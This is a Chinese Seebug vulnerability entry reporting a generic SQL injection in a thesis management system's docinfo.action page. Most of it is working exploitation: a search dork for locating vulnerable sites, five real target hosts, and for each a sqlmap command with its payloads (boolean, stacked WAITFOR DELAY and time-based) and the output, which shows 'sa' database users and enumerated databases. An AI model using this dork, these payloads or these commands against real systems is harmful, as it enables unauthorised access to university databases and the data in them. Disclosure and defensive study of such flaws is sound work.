博云非书论文管理系统存在通用型SQL注入

2015-01-19T00:00:00
ID SSV:95708
Type seebug
Reporter Root
Modified 2015-01-19T00:00:00

Description

简要描述:

论文管理系统存在通用型SQL注入

详细说明:

注入点:dbid和docid 搜索关键字:inurl:/docinfo.action?dbid=

<img src="https://images.seebug.org/upload/201501/14143342fcf43465308f6bc3497cfd0583701857.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

http://202.195.136.150/docinfo.action?dbid=72&docid=40824 http://202.199.163.37/docinfo.action?dbid=72&docid=40619 http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793 http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927 http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517 1)http://202.195.136.150/docinfo.action?dbid=72&docid=40824 sqlmap.py -u "http://202.195.136.150/docinfo.action?dbid=72&docid=40824" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 61 HTTP(s) requ ests:


Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 9888=9888&docid=40824 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40824 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40824


[17:25:15] [INFO] testing MySQL [17:25:32] [WARNING] the back-end DBMS is not MySQL [17:25:32] [INFO] testing Oracle [17:25:49] [WARNING] the back-end DBMS is not Oracle [17:25:49] [INFO] testing PostgreSQL [17:26:06] [WARNING] the back-end DBMS is not PostgreSQL [17:26:06] [INFO] testing Microsoft SQL Server [17:26:23] [INFO] confirming Microsoft SQL Server [17:27:15] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2008 [17:27:15] [INFO] fetching current user [17:27:15] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [17:27:15] [INFO] retrieved: [17:29:12] [INFO] retrieved: [17:29:12] [WARNING] it is very important not to stress the network adapter's ba ndwidth during usage of time-based queries sa current user: 'sa' [17:36:12] [INFO] fetching current database [17:36:12] [INFO] retrieved: [17:38:10] [INFO] retrieved: etd4 current database: 'etd4' [17:50:28] [INFO] fetching database names [17:50:28] [INFO] fetching number of databases [17:50:28] [INFO] retrieved: [17:51:19] [INFO] retrieved: 7 [17:53:44] [INFO] retrieved: [17:55:41] [INFO] retrieved: etd4 [18:07:59] [INFO] retrieved: [18:09:57] [INFO] retrieved: etd4new [18:30:04] [INFO] retrieved: [18:32:01] [INFO] retrieved: idl [18:41:45] [INFO] retrieved: [18:43:44] [INFO] retrieved: master [19:01:04] [INFO] retrieved: [19:03:01] [INFO] retrieved: model [19:18:02] [INFO] retrieved: [19:20:01] [INFO] retrieved: msdb [19:32:17] [INFO] retrieved: [19:34:15] [INFO] retrieved: temp [19:47:23] [ERROR] invalid character detected. retrying.. [19:47:23] [WARNING] increasing time delay to 6 seconds db available databases [7]: [] etd4 [] etd4new [] idl [] master [] model [] msdb [*] tempdb 2)http://202.199.163.37/docinfo.action?dbid=72&docid=40619 sqlmap.py -u "http://202.199.163.37/docinfo.action?dbid=72&docid=40619" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts:


Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 4908=4908&docid=40619 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40619 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40619


[09:45:41] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [09:45:41] [INFO] fetching current user [09:45:41] [INFO] resumed: sa current user: 'sa' [09:45:41] [INFO] fetching current database [09:45:41] [INFO] resumed: etd current database: 'etd' [09:45:41] [INFO] fetching database names [09:45:41] [INFO] fetching number of databases [09:45:41] [INFO] resumed: 5 [09:45:41] [INFO] resumed: etd [09:45:41] [INFO] resumed: master [09:45:41] [INFO] resumed: model [09:45:41] [INFO] resumed: msdb [09:45:41] [INFO] resumed: tempdb available databases [5]: [] etd [] master [] model [] msdb [*] tempdb 3)http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793 sqlmap.py -u "http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts:


Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 1458=1458&docid=5793 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=5793 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=5793


[13:58:21] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [13:58:21] [INFO] fetching current user [13:58:21] [INFO] resumed: sa current user: 'sa' [13:58:21] [INFO] fetching current database [13:58:21] [INFO] resumed: etd current database: 'etd' [13:58:21] [INFO] fetching database names [13:58:21] [INFO] fetching number of databases [13:58:21] [INFO] resumed: 10 [13:58:21] [INFO] resumed: etd [13:58:21] [INFO] resumed: lunwen [13:58:21] [INFO] resumed: master [13:58:21] [INFO] resumed: model [13:58:21] [INFO] resumed: msdb [13:58:21] [INFO] resumed: ReportServer [13:58:21] [INFO] resumed: ReportServerTempDB [13:58:21] [INFO] resumed: tempdb [13:58:21] [INFO] resumed: test [13:58:21] [INFO] resumed: tsk available databases [10]: [] etd [] lunwen [] master [] model [] msdb [] ReportServer [] ReportServerTempDB [] tempdb [] test [] tsk 4)http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927 sqlmap.py -u "http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts:


Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 7461=7461&docid=13927 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=13927 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=13927


[11:41:58] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2008 [11:41:58] [INFO] fetching current user [11:41:58] [INFO] resumed: etd current user: 'etd' [11:41:58] [INFO] fetching current database [11:41:58] [INFO] resumed: etd4 current database: 'etd4' [11:41:58] [INFO] fetching database names [11:41:58] [INFO] fetching number of databases [11:41:58] [INFO] resumed: 9 [11:41:58] [INFO] resumed: chek [11:41:58] [INFO] resumed: etd4 [11:41:58] [INFO] resumed: idl30 [11:41:58] [INFO] resumed: master [11:41:58] [INFO] resumed: model [11:41:58] [INFO] resumed: msdb [11:41:58] [INFO] resumed: ReportServer$LIB [11:41:58] [INFO] resumed: ReportServer$LIBTempDB [11:41:58] [INFO] resumed: tempdb available databases [9]: [] chek [] etd4 [] idl30 [] master [] model [] msdb [] ReportServer$LIB [] ReportServer$LIBTempDB [*] tempdb 5)http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517 sqlmap.py -u "http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts:


Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 1334=1334&docid=62517 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=62517 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=62517


[13:59:22] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [13:59:22] [INFO] fetching current user [13:59:22] [INFO] resumed: sa current user: 'sa' [13:59:22] [INFO] fetching current database [13:59:22] [INFO] resumed: etd current database: 'etd' [13:59:22] [INFO] fetching database names [13:59:22] [INFO] fetching number of databases [13:59:22] [INFO] resumed: 7 [13:59:22] [INFO] resumed: etd [13:59:22] [INFO] resumed: idl30 [13:59:22] [INFO] resumed: idl30oooo [13:59:22] [INFO] resumed: master [13:59:22] [INFO] resumed: model [13:59:22] [INFO] resumed: msdb [13:59:22] [INFO] resumed: tempdb available databases [7]: [] etd [] idl30 [] idl30oooo [] master [] model [] msdb [*] tempdb

漏洞证明:

已证明